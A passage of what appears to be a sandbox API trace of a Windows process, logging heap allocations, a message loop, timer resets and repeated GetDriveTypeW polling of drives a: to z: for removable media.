wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.551] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.551] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.552] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.552] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.552] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.552] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.552] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.552] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.553] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.553] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.553] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.553] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.554] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.554] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.554] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.554] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.554] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.555] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.555] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.555] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.555] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.564] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.565] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.565] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.565] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.565] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.566] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.566] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.566] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.567] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.567] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.567] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.567] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.568] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.568] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.568] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.568] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.568] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.569] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0218.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0218.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0218.570] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0218.570] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0218.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.571] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.572] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.572] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.572] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.573] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.573] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.573] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.573] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.573] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.574] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.574] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.574] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.574] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.574] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.574] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.575] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.575] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.575] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.575] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.575] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.576] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.576] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.576] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.576] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.576] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.576] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.577] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.577] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.577] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0218.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0218.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0218.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.579] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.579] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.579] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.579] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0218.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.580] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.580] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.581] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0218.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.582] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.582] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.582] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.582] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.582] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.583] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.583] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.583] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.583] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.583] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.584] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.584] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.584] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.584] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.584] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.585] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.585] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.585] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.585] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.585] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.586] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.586] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.586] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.586] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.587] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.587] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.588] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0218.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.589] CompareStringW (Locale=0x400, 